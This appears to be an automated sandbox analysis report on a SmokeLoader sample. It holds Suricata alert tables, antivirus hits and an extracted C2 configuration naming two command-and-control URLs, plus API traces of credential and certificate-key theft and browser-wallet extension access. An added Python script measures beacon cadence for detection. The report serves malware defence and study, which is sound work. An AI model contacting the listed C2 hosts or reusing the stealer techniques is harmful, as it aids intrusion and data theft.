2024-10-08T03:15:31.283857+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50001 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:32.191015+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50008 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:33.069306+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50015 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:33.957275+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50024 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:34.867331+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50030 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:36.316479+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50036 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:37.218884+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50043 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:43.167928+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50055 -> 23.145.40.168:443 | TCP
2024-10-08T03:16:17.332902+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50056 -> 180.75.11.133:80 | TCP
2024-10-08T03:16:25.215333+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50057 -> 180.75.11.133:80 | TCP
2024-10-08T03:16:35.175377+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50058 -> 180.75.11.133:80 | TCP
2024-10-08T03:16:47.543160+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50059 -> 180.75.11.133:80 | TCP
2024-10-08T03:16:57.444928+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50060 -> 23.145.40.168:443 | TCP
2024-10-08T03:16:58.438011+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50061 -> 23.145.40.168:443 | TCP
2024-10-08T03:17:02.272122+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50062 -> 201.103.8.135:80 | TCP
2024-10-08T03:17:16.307008+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50063 -> 23.145.40.168:443 | TCP
2024-10-08T03:17:20.704358+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50064 -> 201.103.8.135:80 | TCP
2024-10-08T03:17:34.328112+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50065 -> 23.145.40.168:443 | TCP
2024-10-08T03:17:38.839751+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50066 -> 201.103.8.135:80 | TCP
2024-10-08T03:17:51.835614+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50067 -> 23.145.40.168:443 | TCP
2024-10-08T03:17:56.257177+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:50068 -> 201.103.8.135:80 | TCP
Timestamp | SID | Severity | Classtype | Source -> Destination | Protocol
2024-10-08T03:18:03.951900+0200 | 2019082 | 1 | A Network Trojan was detected | 192.168.2.4:50069 -> 23.145.40.113:443 | TCP
2024-10-08T03:18:03.968253+0200 | 2019082 | 1 | A Network Trojan was detected | 192.168.2.4:50069 -> 23.145.40.113:443 | TCP
Timestamp | SID | Severity | Classtype | Source -> Destination | Protocol
2024-10-08T03:15:19.556728+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49915 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:21.301374+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49924 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:22.202449+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49935 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:23.407326+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49942 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:24.284045+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49951 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:25.174280+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49959 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:26.096204+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49965 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:27.035482+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49971 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:27.919881+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49977 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:28.860193+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49983 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:29.756748+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49989 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:30.634802+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49995 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:31.568650+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:50001 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:32.467294+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:50008 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:33.339954+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:50015 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:34.238068+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:50024 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:35.149562+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:50030 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:36.592551+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:50036 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:38.491915+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:50043 -> 23.145.40.168:443 | TCP
2024-10-08T03:16:57.772199+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:50060 -> 23.145.40.168:443 | TCP
2024-10-08T03:16:58.803947+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:50061 -> 23.145.40.168:443 | TCP
2024-10-08T03:17:16.585580+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:50063 -> 23.145.40.168:443 | TCP
2024-10-08T03:17:34.688036+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:50065 -> 23.145.40.168:443 | TCP
2024-10-08T03:17:52.198933+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:50067 -> 23.145.40.168:443 | TCP
Timestamp | SID | Severity | Classtype | Source -> Destination | Protocol
2024-10-08T03:15:19.731852+0200 | 2829848 | 2 | Potentially Bad Traffic | 23.145.40.168:443 -> 192.168.2.4:49915 | TCP
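What the alert tables show beyond the signature hits is cadence: the sample hits 180.75.11.133:80 roughly every 1.4 s for a minute, then 23.145.40.168:443 at sub-second intervals, and both far faster than a normal beacon, which is itself a usable signal once the IPs rotate. The script below is an added example (not Suricata or Joe Sandbox code) that reads Suricata EVE JSON alert records, groups them by signature ID and destination, and estimates the median interval and the spread of the gaps. The EVE field names are Suricata's own; the records are constructed from a handful of timestamps and endpoints in the tables above, and the jitter metric and `min_hits` cut-off are the author's choices.

```python
"""Estimate beaconing cadence from Suricata EVE alert records, grouped by
(signature ID, destination).

Added example; not Suricata or Joe Sandbox code. EVE_LINES are constructed
from timestamps/endpoints in the report's alert tables; field names follow
Suricata's eve.json. The jitter metric is the author's choice.
"""
import json
import statistics
from collections import defaultdict
from datetime import datetime

EVE_LINES = """
{"timestamp":"2024-10-08T03:14:22.194672+0200","event_type":"alert","src_ip":"192.168.2.4","src_port":49736,"dest_ip":"180.75.11.133","dest_port":80,"proto":"TCP","alert":{"signature_id":2039103,"severity":1,"category":"A Network Trojan was detected"}}
{"timestamp":"2024-10-08T03:14:22.300000+0200","event_type":"flow","src_ip":"192.168.2.4","src_port":49736,"dest_ip":"180.75.11.133","dest_port":80,"proto":"TCP"}
{"timestamp":"2024-10-08T03:14:23.607928+0200","event_type":"alert","src_ip":"192.168.2.4","src_port":49737,"dest_ip":"180.75.11.133","dest_port":80,"proto":"TCP","alert":{"signature_id":2039103,"severity":1,"category":"A Network Trojan was detected"}}
{"timestamp":"2024-10-08T03:14:24.986323+0200","event_type":"alert","src_ip":"192.168.2.4","src_port":49738,"dest_ip":"180.75.11.133","dest_port":80,"proto":"TCP","alert":{"signature_id":2039103,"severity":1,"category":"A Network Trojan was detected"}}
{"timestamp":"2024-10-08T03:14:26.372379+0200","event_type":"alert","src_ip":"192.168.2.4","src_port":49739,"dest_ip":"180.75.11.133","dest_port":80,"proto":"TCP","alert":{"signature_id":2039103,"severity":1,"category":"A Network Trojan was detected"}}
{"timestamp":"2024-10-08T03:15:19.556728+0200","event_type":"alert","src_ip":"192.168.2.4","src_port":49915,"dest_ip":"23.145.40.168","dest_port":443,"proto":"TCP","alert":{"signature_id":2809882,"severity":1,"category":"Malware Command and Control Activity Detected"}}
{"timestamp":"2024-10-08T03:15:19.731852+0200","event_type":"alert","src_ip":"23.145.40.168","src_port":443,"dest_ip":"192.168.2.4","dest_port":49915,"proto":"TCP","alert":{"signature_id":2829848,"severity":2,"category":"Potentially Bad Traffic"}}
{"timestamp":"2024-10-08T03:15:21.301374+0200","event_type":"alert","src_ip":"192.168.2.4","src_port":49924,"dest_ip":"23.145.40.168","dest_port":443,"proto":"TCP","alert":{"signature_id":2809882,"severity":1,"category":"Malware Command and Control Activity Detected"}}
{"timestamp":"2024-10-08T03:15:22.202449+0200","event_type":"alert","src_ip":"192.168.2.4","src_port":49935,"dest_ip":"23.145.40.168","dest_port":443,"proto":"TCP","alert":{"signature_id":2809882,"severity":1,"category":"Malware Command and Control Activity Detected"}}
{"timestamp":"2024-10-08T03:15:23.407326+0200","event_type":"alert","src_ip":"192.168.2.4","src_port":49942,"dest_ip":"23.145.40.168","dest_port":443,"proto":"TCP","alert":{"signature_id":2809882,"severity":1,"category":"Malware Command and Control Activity Detected"}}
"""


def parse_ts(s):
    """Suricata writes offsets as +0200; older Pythons need +02:00 for fromisoformat."""
    if len(s) >= 5 and s[-5] in "+-" and s[-3] != ":":
        s = s[:-2] + ":" + s[-2:]
    return datetime.fromisoformat(s)


def load_alerts(text):
    """Keep only event_type == alert and flatten the fields we need."""
    alerts = []
    for line in text.strip().splitlines():
        rec = json.loads(line)
        if rec.get("event_type") != "alert":
            continue
        alerts.append({
            "ts": parse_ts(rec["timestamp"]),
            "sid": rec["alert"]["signature_id"],
            "category": rec["alert"]["category"],
            "src": f'{rec["src_ip"]}:{rec["src_port"]}',
            "dst": f'{rec["dest_ip"]}:{rec["dest_port"]}',
        })
    return alerts


def beacon_stats(alerts, min_hits=3):
    """Per (sid, destination): hit count, median gap between consecutive hits,
    jitter ratio (max gap - min gap) / median, and total span in seconds."""
    groups = defaultdict(list)
    for a in alerts:
        groups[(a["sid"], a["dst"])].append(a["ts"])
    stats = {}
    for key, times in groups.items():
        if len(times) < min_hits:          # too few samples to call a cadence
            continue
        times.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        median = statistics.median(gaps)
        stats[key] = {
            "hits": len(times),
            "median_interval_s": round(median, 3),
            "jitter_ratio": round((max(gaps) - min(gaps)) / median, 3) if median else None,
            "span_s": round((times[-1] - times[0]).total_seconds(), 3),
        }
    return stats


def top_talkers(stats):
    """Most frequent destinations first; ties broken by the tighter cadence."""
    return sorted(stats, key=lambda k: (-stats[k]["hits"], stats[k]["median_interval_s"]))


if __name__ == "__main__":
    stats = beacon_stats(load_alerts(EVE_LINES))
    for sid, dst in top_talkers(stats):
        s = stats[(sid, dst)]
        print(f"SID {sid} -> {dst}: {s['hits']} hits, median {s['median_interval_s']}s, "
              f"jitter {s['jitter_ratio']}, over {s['span_s']}s")
```

Four samples per group is enough to show the mechanics but not to judge jitter reliably; on a production sensor, run it over hours of alerts per destination, and expect real SmokeLoader builds to space their check-ins out much more widely than this sandbox run did.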


    AV Detection

Source: ctMI3TYXpX.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\jghruer | Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Roaming\hdhruer | Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
Source: C:\Users\user\AppData\Roaming\jghruer | ReversingLabs: Detection: 28%
Source: ctMI3TYXpX.exe | ReversingLabs: Detection: 28%
Source: ctMI3TYXpX.exe | Virustotal: Detection: 38%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\B972.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jghruer | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\hdhruer | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Joe Sandbox ML: detected
Source: ctMI3TYXpX.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B972.exe | Code function: 9_2_00007FF6F2D63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,9_2_00007FF6F2D63220
Source: C:\Users\user\AppData\Local\Temp\B972.exe | Code function: 9_2_00007FF6F2D636F0 CryptExportKey,CryptExportKey,9_2_00007FF6F2D636F0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_02753098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,13_2_02753098
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_02753717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,13_2_02753717
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_02753E04 RtlCompareMemory,CryptUnprotectData,13_2_02753E04
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_0275123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,13_2_0275123B
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_027511E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,13_2_027511E1
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_02751198 CryptBinaryToStringA,CryptBinaryToStringA,13_2_02751198
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_02751FCE CryptUnprotectData,RtlMoveMemory,13_2_02751FCE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_0014245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,16_2_0014245E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_00142404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,16_2_00142404
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_0014263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,16_2_0014263E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02EF25A4 CryptBinaryToStringA,CryptBinaryToStringA,19_2_02EF25A4
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02EF2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,19_2_02EF2799
Source: ctMI3TYXpX.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49915 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49924 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49935 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49942 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49951 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49959 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49965 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49971 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49977 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49989 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49995 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50001 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50008 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50015 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50024 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50030 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50055 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50060 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50061 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50063 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50065 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50067 version: TLS 1.2
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D6FB38 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,9_2_00007FF6F2D6FB38
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02752B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,13_2_02752B15
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02753ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,13_2_02753ED9
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02751D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,13_2_02751D4A
    Source: C:\Windows\explorer.exeCode function: 15_2_00CD30A8 FindFirstFileW,FindNextFileW,FindClose,15_2_00CD30A8
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

    Networking

    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49784 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49803 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49841 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49822 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49812 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49795 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49831 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50056 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50057 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50059 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50058 -> 180.75.11.133:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50062 -> 201.103.8.135:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50066 -> 201.103.8.135:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50064 -> 201.103.8.135:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50068 -> 201.103.8.135:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49915 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49915 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49951 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49942 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49951 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49935 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49959 -> 23.145.40.168:443
